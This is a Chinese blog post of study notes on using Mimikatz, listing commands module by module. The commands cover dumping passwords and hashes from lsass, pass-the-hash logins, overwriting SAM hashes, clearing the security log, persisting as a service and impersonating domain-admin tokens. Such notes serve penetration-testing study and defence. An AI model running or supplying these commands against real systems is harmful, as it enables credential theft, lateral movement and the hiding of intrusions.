Mimikatz 用法详解

最近看了苑老师讲解的mimikatz ，于是有了一下的这些总结

mimikatz 是黑客最喜欢使用的工具之一，甚至不亚于Nmap

遗憾的是作者是一个法国大哥，官网我是一点都看不懂，翻译过来也是乱七八糟，感谢苑老师讲解

模块化设计的一个工具

需要在管理员权限或者SYSTEM权限下使用

可以直接输入一个 ? 进入标准模块，不过标准模块并没有特别多的用处

privilege

privilege::debug

提升为debug权限

privilege::id 20

调整id来调整权限，debug 是20，driver是10

CRYPTO （导出未标记为可导出的证书）

一般私钥会被标记为不可导出，使用这个参数可以给系统打patch，之后就可以导出了

crypto::providers

查看加密提供者，因为在windows中有各种各样的加密，这个参数可以查看提供者

一般有 CryptoAPI和 CNG 两种，其重CNG较为古老

crypto::stores

证书存储，windows 系统中有很多证书存储，默认的是CURRENT_USER 这个证书存储

这个命令可以查看这些证书存储下都有什么

如果我们想指定某个证书存储(以local_machine为例)

crypto::stores /systemstore:local_machine

crypto::certificates

查看子存储有哪些证书

默认Current_USER

可以使用 crypto::certificates /store:Root 查看Root存储的具体的信息

除了直接查询，我们也可以导出证书信息（在mimikatz目录下）

crypto::certificates/store:Root /export

导出的公钥是DER格式的

导出的私钥是PFX格式的

密码 mimikatz

crypto::capi

给CryptoAPI打补丁，比较新的系统可以使用这个打补丁，之后就支持CryptoAPI导出了

crypto::cng

打 cng 补丁

crypto::sc

列出智能卡读卡器

crypto::keys

读取密钥

可以添加一下参数来进行选择性查看

/provider -

/providertype

/cngprovider

/export 导出密钥PVK files这个格式并不是我们平常的pem 格式，我们需要进一步转换

openssl rsa –inform pvk –in key.pvk–outform pem –out key.pem

sekurlsa

从lsass进程中提取passwords、keys、pin、tickets等信息

注意，既然是从内存中读取，那么就不会去SAM数据库读取，所以SAM数据库临时改动，只要内存中没有，那就读取不到

sekurlsa::msv

获取HASH (LM,NTLM)

sekurlsa::wdigest

通过可逆的方式去内存中读取明文密码

sekurlsa::Kerberos

假如域管理员正好在登陆了我们的电脑，我们可以通过这个命令来获取域管理员的明文密码

sekurlsa::tspkg

通过tspkg读取明文密码

sekurlsa::livessp

通过livessp 读取明文密码

sekurlsa::ssp

通过ssp 读取明文密码

sekurlsa::logonPasswords

通过以上各种方法读取明文密码

sekurlsa::process

将自己的进程切换到lsass进程中，之前只是注入读取信息

sekurlsa::minidump file

这个模块可以读取已经打包的内存信息

比如我们之前已经将lsass 进程中的内存信息保存为dmp 文件了，那么此时我们可以离线的读取其中的信息了

需要制定文件名

sekurlsa::pth

pass-the-hash

可以直接用hash来进行登录

sekurlsa::pth /user:administrator/domain:host1 /ntlm:cdf34cda4e455232323xxxx

sekurlsa::pth /user:administrator/domain:host1 /aes256:cdf34cda4e455232323xxxx

其中/domain 如果加入了域，那就填写域名，如果没有，那就写计算机名

执行后会在本地新开一个以hash身份的命令行窗口

process

进程模块

process::list

列出进程列表

process::exports

导出进程列表

process::imports

导入列表

process::start

开始一个进程

process::stop

停止一个程序

process::suspend

冻结一个进程

process::resume

从冻结中恢复

process::run notepad

运行一个程序

process::runp

以SYSTEM系统权限打开一个新的mimikatz窗口

lsadump

通过查询SAM数据库来读取HASH

lsadump::sam

lsadump::setntlm /user:zs/ntlm:a3c4c5bb4c32xxxx

直接修改zs 用户在SAM数据库中的HASH，这样就不需要破解密码了

service

服务管理

service::list

列出当前服务

service::+

mimikatz 将自己注册为一个系统服务，这样每次系统起来就会自动运行了

ts

终端服务 terminal service

ts::multirdp

默认非服务器系统，windows只允许一个用户登录，也就是说如果我让别人远程登录我的电脑，那么我就不能操作了

这个命令可以让其支持多个用户同时在线

ts::sessions

可以查看当前登录用户的登录信息

可以看到当前的登录sessions，并且每个session都有编号

ts::remote /id:1

此时会跳出当前用户的账号，在主界面可以看到session为1的那个账号的已经登录了，我们输入密码可以看到他的登录信息，比如他在打开哪些文件

event

关于日志的操作，比如清空安全日志中的所有日志

日志信息有很多，其中比较重要的是安全日志，其中包含xx在xx时间登录了

event:clear

清空安全日志

event:drop

避免新的日志继续产生（现在效果还不好，是一个试验性的功能）

misc

杂项功能

misc::cmd

misc::regedit

misc::taskmgr

打开cmd，注册表编辑器，任务管理器等

misc::clip

监听剪切板

执行之后会一直监听着，直到我们输入Ctrl+c

dpapi

基于密码系统级别的应用数据保护服务（密码／私钥）

支持以上使用数据保护的服务

token

令牌

token::whoami

查看我是谁

token::list

列出都有哪些登录了的账号

token::elevate /lab

假如lab域存在，我们可以假冒成为域管理员的token

token::revert

取消假冒

vault

vault::cred

查看系统凭据